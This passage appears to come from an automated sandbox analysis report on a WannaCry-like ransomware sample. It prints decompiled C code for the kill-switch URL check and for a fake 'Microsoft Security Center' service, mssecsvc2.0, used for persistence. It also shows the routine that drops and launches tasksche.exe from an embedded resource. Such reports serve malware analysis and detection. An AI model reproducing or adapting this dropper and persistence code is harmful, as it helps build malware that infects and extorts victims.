InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5

Strings

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A

Memory Dump Source

Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
API String ID: 774561529-2942426231
Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F56FB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

Microsoft Security Center (2.0) Service, xrefs: 00407C90
mssecsvc2.0, xrefs: 00407C95
%s -m security, xrefs: 00407C50

Memory Dump Source

Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-4063779371
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}

0x0040809f
0x004080a5
0x004080ab
0x004080ae
0x004080c9
0x004080cb
0x004080cd
0x004080e8
0x004080ea
0x004080ec
0x004080f1
0x004080fa
0x004080fa
0x004080fd
0x00408100
0x00408105
0x0040810e
0x00408116
0x0040811e
0x00408130
0x004080b0
0x004080b8
0x004080b8

APIs

GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F56FB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: mssecsvc2.0
API String ID: 4274534310-3729025388
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: stN592INV6.exePID: 6052, Parent PID: 576COMMON

Executed Functions

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				int _t9;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
					return _t9;
				} else {
					return E00407F20(_t26);
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F56FB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: mssecsvc2.0
API String ID: 4274534310-3729025388
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.MSVCRT ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				_push(_t27);
				InternetCloseHandle(); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x0040819c
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5

Strings

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A

Memory Dump Source

Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
API String ID: 774561529-2942426231
Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F56FB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

Microsoft Security Center (2.0) Service, xrefs: 00407C90
%s -m security, xrefs: 00407C50
mssecsvc2.0, xrefs: 00407C95

Memory Dump Source

Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-4063779371
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x0
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x0
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d36
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebb
0x00407ebc
0x00407ec6
0x00407ec7
0x00407ec8
0x00407ec9
0x00407ece
0x00407ecf
0x00407ed0
0x00407ed1
0x00407ed2
0x00407ed3
0x00407edb
0x00407ee0
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F56FB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C

Strings

/i, xrefs: 00407E8D
CreateProcessA, xrefs: 00407D07
C:\%s\qeriuwjhrf, xrefs: 00407E12
CreateFileA, xrefs: 00407D0F
D, xrefs: 00407ED3
WINDOWS, xrefs: 00407DF2, 00407E0D
C:\%s\%s, xrefs: 00407DFB
tasksche.exe, xrefs: 00407DEA
CloseHandle, xrefs: 00407D29
kernel32.dll, xrefs: 00407CEA
WriteFile, xrefs: 00407D1C

Memory Dump Source

Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 4072214828-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tasksche.exePID: 2396, Parent PID: 7116COMMON

Non-executed Functions

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

